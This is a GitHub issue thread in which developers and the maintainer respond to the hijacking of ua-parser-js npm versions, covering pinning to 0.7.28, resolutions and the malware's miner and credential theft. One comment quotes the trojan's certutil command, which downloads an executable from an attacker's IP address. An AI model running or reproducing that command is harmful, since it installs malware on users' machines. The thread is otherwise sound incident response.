
Security issue: compromised npm packages of ua-parser-js (0.7.29, 0.8.0, 1.0.0) - Questions about deprecated npm package ua-parser-js

Open SuperOleg39 opened this issue 3 years ago • 187 comments

Hi!

See a warning at npm - https://www.npmjs.com/package/ua-parser-js - This package has been hijacked. Please revert to 0.7.28

First question - Can we use the range ^0.7.28, or is it not safe?

Second question - Will you create a new package, or try to remove the hijacked versions and continue updating this package?

SuperOleg39 avatar Oct 22 '21 13:10 SuperOleg39

Ouch does that mean like there's malicious code in it or something?

@faisalman

nypinstripes avatar Oct 22 '21 13:10 nypinstripes

I just updated the package and Windows Defender blocked "ceprolad.a", a trojan. I didn't have any internet access at that moment... The trojan tries to execute in cmd: "certutil -rulcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe". The certutil -rulcache -f downloads a .exe file.

LyesIsogeo avatar Oct 22 '21 14:10 LyesIsogeo

Update - the ^0.7.28 range is dangerous; version 0.7.29 has already been published.

We all need to pin 0.7.28 in our dependencies.

SuperOleg39 avatar Oct 22 '21 14:10 SuperOleg39

@faisalman I hope you can revert the versions with vulnerabilities?

SuperOleg39 avatar Oct 22 '21 14:10 SuperOleg39

0.7.29 includes scripts that download and execute binaries. From the command-line arguments, one of them looks like a cryptominer, but that might be just for camouflage.

KalleOlaviNiemitalo avatar Oct 22 '21 14:10 KalleOlaviNiemitalo

Revert back to 0.7.28; all greater versions are infected. My computer was infected this morning when I updated my Docusaurus version. https://twitter.com/DrocksAlex/status/1451543176779534342

NPM official flag: https://www.npmjs.com/package/ua-parser-js

alex-drocks avatar Oct 22 '21 14:10 alex-drocks

The best solution is to publish the 0.7.30 version without the vulnerability. Then ^ will jump past the vulnerable version.

Tom910 avatar Oct 22 '21 15:10 Tom910

Hi all, very sorry about this.

I noticed something unusual when my email was suddenly flooded by spam from hundreds of websites (maybe so I wouldn't realize something was up; luckily the effect was quite the contrary).

I believe someone was hijacking my npm account and published some compromised packages (0.7.29, 0.8.0, 1.0.0) which will probably install malware, as can be seen from the diff here: https://app.renovatebot.com/package-diff?name=ua-parser-js&from=0.7.28&to=1.0.0

I have sent a message to NPM support since I can't seem to unpublish the compromised versions (maybe due to npm policy https://docs.npmjs.com/policies/unpublish) so I can only deprecate them with a warning message.

faisalman avatar Oct 22 '21 15:10 faisalman

@faisalman did you use the "Report malware" button? I don't know how quick NPM support usually is but I imagine they might pay attention to that.

KalleOlaviNiemitalo avatar Oct 22 '21 15:10 KalleOlaviNiemitalo

I think we should publish new versions above these hijacked versions.

Like: 0.7.30, 0.8.1, 1.0.1

ohanedan avatar Oct 22 '21 15:10 ohanedan

I think we should publish new versions above these hijacked versions.

Like: 0.7.30, 0.8.1, 1.0.1

A little problem with that decision - it will be hard to remove these versions in the future.

So, ua-parser-js will need to bump the version to 2.0.0 when it wants to push real updates.

SuperOleg39 avatar Oct 22 '21 15:10 SuperOleg39

Extra care is required because it seems to be affecting Linux machines as well; make sure the miner doesn't get installed on your servers & CI stuff.

For now it seems to only hang during installation because the URL hosting the infection doesn't seem to be working, but that may not last.

Linux users can use this command to see if the miner is running or not and stop it: ps -aux | grep jsextension

benjilebon avatar Oct 22 '21 15:10 benjilebon

I think we should publish new versions above these hijacked versions. Like: 0.7.30, 0.8.1, 1.0.1

A little problem with that decision - it will be hard to remove these versions in the future.

So, ua-parser-js will need to bump the version to 2.0.0 when it wants to push real updates.

That's right, but it's the safest method I think. You can continue with version 2.0.0, and users who don't specify a specific version will not be affected.

ohanedan avatar Oct 22 '21 15:10 ohanedan

@faisalman did you use the "Report malware" button? I don't know how quick NPM support usually is but I imagine they might pay attention to that.

Yes I've sent the report using that form, hope they can just be removed. Otherwise, I have to publish under new versions.

faisalman avatar Oct 22 '21 15:10 faisalman

This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.

aimozg avatar Oct 22 '21 15:10 aimozg

This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.

Does it? I'd have to change all my passwords.

alex-drocks avatar Oct 22 '21 15:10 alex-drocks

This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.

You're right.. OK then

faisalman avatar Oct 22 '21 16:10 faisalman

This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.

Does it? I'd have to change all my passwords.

I've uploaded the DLL it runs to VirusTotal (before unplugging the ethernet): https://www.virustotal.com/gui/file/2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd/behavior. It reads browser user data files, and I've checked "files written" against my infected PC; it does look like a script to export OS credentials and a copy of the cookies DB file from Chrome.

aimozg avatar Oct 22 '21 16:10 aimozg

We fixed it using this in our package.json: "resolutions": { "**/ua-parser-js": "0.7.28" }

gaelhuot avatar Oct 22 '21 16:10 gaelhuot

I think we should publish new versions above these hijacked versions.

Like: 0.7.30, 0.8.1, 1.0.1

Done. Thanks for the suggestion 👍

faisalman avatar Oct 22 '21 16:10 faisalman

A solution that we're using to address this vulnerability is to set the resolutions in package.json to use the last good version:

...},"resolutions": { "ua-parser-js": "0.7.28" },...

That resolution will come in handy when using a library that depends on the latest of ua-parser-js as opposed to using ua-parser-js directly in your package.json dependencies.

Cphusion avatar Oct 22 '21 16:10 Cphusion

Please update the title of this issue to better reflect the security issue to users.

Tim-arts avatar Oct 22 '21 16:10 Tim-arts

For information, this package is in use in at least 4 Expo libs.

├─┬ @react-navigation/[email protected]
│ └─┬ [email protected]
│   └─┬ [email protected]
│     └── [email protected] deduped
├─┬ [email protected]
│ └── [email protected]
├─┬ [email protected]
│ └─┬ [email protected]
│   └─┬ [email protected]
│     └── [email protected] deduped
└─┬ [email protected]
  └─┬ [email protected]
    └── [email protected] deduped

rafipiccolo avatar Oct 22 '21 17:10 rafipiccolo

@faisalman Do you have 2FA enabled on your NPM account?

daveg717 avatar Oct 22 '21 17:10 daveg717

For information, this package is in use in at least 4 Expo libs.

├─┬ @react-navigation/[email protected]
│ └─┬ [email protected]
│   └─┬ [email protected]
│     └── [email protected] deduped
├─┬ [email protected]
│ └── [email protected]
├─┬ [email protected]
│ └─┬ [email protected]
│   └─┬ [email protected]
│     └── [email protected] deduped
└─┬ [email protected]
  └─┬ [email protected]
    └── [email protected] deduped

Also in Docusaurus.

alex-drocks avatar Oct 22 '21 17:10 alex-drocks

https://blog.sonatype.com/newly-found-npm-malware-mines-cryptocurrency-on-windows-linux-macos-devices

faisalman avatar Oct 22 '21 17:10 faisalman

@faisalman Do you have 2FA enabled on your NPM account?

Yes.. if you're an OSS dev you need 2FA, preferably NOT SMS based.

Your account recovery email should also be set up with 2FA, and your password manager of choice as well. Again not SMS based.

DanielJoyce avatar Oct 22 '21 17:10 DanielJoyce

@faisalman Thank you for your quick response to the attack.

KalleOlaviNiemitalo avatar Oct 22 '21 18:10 KalleOlaviNiemitalo

// Update

Here's a summary of what I was able to figure out on this incident based on the code and previous incidents of similar nature both in npm and RubyGems:

https://www.whitesourcesoftware.com/resources/blog/popular-javascript-library-ua-parser-js-compromised-via-account-takeover/

This code contains two malicious components:

a) a cryptocurrency mining tool (ref: https://bit.ly/3Ca9lw1)
b) trojan software (ref: https://bit.ly/3B6uXIk), but only for Windows, stealing credentials from browsers

Both are really serious but the biggest impact is (probably) on the Windows users. Let me look into the wallet and check the malicious files in more detail...

A bit of good news is that the majority of Windows antivirus software was able to identify and stop the trojan component:

[Screenshot from 2021-10-22 21-14-48]

It is still worth pointing out that some previous incidents around crypto (mainly in RubyGems) had the miners modifying the registry on Windows, making them start again after a system restart.

// Edit

No way to check activity on this, since Monero does not allow blockchain exploration as freely as others:

Sorry, its not possible to find txs associated with normal addresses in Monero 

mensfeld avatar Oct 22 '21 18:10 mensfeld

A bit of good news is that the majority of Windows antivirus software was able to identify and stop the trojan component:

They do now, but in the first hours only a few antiviruses on VirusTotal detected it.

It is still worth pointing out that some previous incidents around crypto (mainly in RubyGems) had the miners modifying the registry on Windows, making them start again after a system restart.

In my case it registered itself into %appdata%/Microsoft/windows/start menu/programs/startup

aimozg avatar Oct 22 '21 20:10 aimozg